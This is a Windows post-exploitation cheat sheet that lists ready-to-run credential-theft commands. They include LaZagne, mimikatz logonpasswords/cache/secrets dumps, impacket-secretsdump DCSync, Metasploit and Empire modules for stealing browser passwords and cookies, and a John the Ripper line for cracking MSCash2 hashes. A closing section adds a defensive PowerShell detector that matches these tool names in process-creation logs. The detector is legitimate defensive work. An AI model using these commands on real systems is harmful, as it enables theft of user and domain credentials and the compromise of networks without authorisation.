# Post Exploitation

### LaZagne

A simple, handy tool for credential dumping.

* <https://github.com/AlessandroZ/LaZagne>
* <https://github.com/AlessandroZ/LaZagne/releases/tag/2.4.3>

```
.\laZagne.exe all
```

### MSCash

MSCash is the Microsoft hashing algorithm used to store cached domain credentials locally on a system after a successful logon.

From mimikatz:

```
privilege::debug
lsadump::cache
```

Cracking it:

```
john-jumbo mscash --wordlist=/usr/share/wordlists/rockyou.txt  --format=mscash2
```

### Reading Event Logs

The user must be a member of the "Event Log Readers" group. See [this link](https://evotec.xyz/powershell-everything-you-wanted-to-know-about-event-logs/) for more on working with event logs in PowerShell.

```powershell
Get-WinEvent -ListLog *

# Listing logs on a remote computer with a specific user's credentials
$cred = Get-Credential
Get-WinEvent -ListLog * -ComputerName AD1 -Credential $cred

# Reading Security logs
# Properties[5] and Properties[8] are NewProcessName and CommandLine in process creation events (ID 4688)
(Get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessName';expression={ $_.Properties[5].Value }}, @{name='CommandLine';expression={ $_.Properties[8].Value }}).commandline
```

### Password Dumping

```powershell
# Metasploit
post/windows/gather/enum_chrome
post/multi/gather/firefox_creds
post/firefox/gather/cookies
post/firefox/gather/passwords
post/windows/gather/forensics/browser_history
post/windows/gather/enum_putty_saved_sessions

# Empire
collection/ChromeDump
collection/FoxDump
collection/netripper
credentials/sessiongopher

# mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::secrets

# dcsync - secretsdump
impacket-secretsdump morph3@1.3.3.7
```
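
From the defender's side, the `NewProcessName` and `CommandLine` fields pulled out in the Reading Event Logs section can be searched for the tool and command names listed on this page. The following is an added example, not part of the original notes; the function name `Find-CredDumpProcess`, the indicator list and the sample records are assumptions constructed for illustration.

```powershell
# Added example: flag process-creation records that reference the tools
# and commands listed on this page. Names and sample data are assumptions.
$Indicators = @('lazagne', 'mimikatz', 'privilege::debug', 'lsadump::cache',
                'lsadump::secrets', 'sekurlsa::logonpasswords', 'secretsdump')

function Find-CredDumpProcess {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [psobject]$Record,
        [string[]]$Indicator = $Indicators
    )
    process {
        # Search image path and arguments together; -like is case-insensitive.
        $haystack = '{0} {1}' -f $Record.NewProcessName, $Record.CommandLine
        $hits = @($Indicator | Where-Object { $haystack -like "*$_*" })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                NewProcessName = $Record.NewProcessName
                CommandLine    = $Record.CommandLine
                Matched        = $hits -join ', '
            }
        }
    }
}

# Constructed sample records, shaped like the Select-Object projection above.
$sample = @(
    [pscustomobject]@{ NewProcessName = 'C:\Windows\System32\cmd.exe'
                       CommandLine    = 'cmd.exe /c whoami' }
    [pscustomobject]@{ NewProcessName = 'C:\Users\Public\laZagne.exe'
                       CommandLine    = '.\laZagne.exe all' }
    [pscustomobject]@{ NewProcessName = 'C:\Temp\mimikatz.exe'
                       CommandLine    = 'mimikatz.exe "privilege::debug" "lsadump::cache" exit' }
)

# Only the second and third records are returned, each with its matched indicators.
$sample | Find-CredDumpProcess | Format-List

# Live use (needs Event Log Readers membership):
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } |
#   Select-Object @{ n = 'NewProcessName'; e = { $_.Properties[5].Value } },
#                 @{ n = 'CommandLine';    e = { $_.Properties[8].Value } } |
#   Find-CredDumpProcess
```

The `CommandLine` field of event 4688 is only populated when the "Include command line in process creation events" audit policy is enabled.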
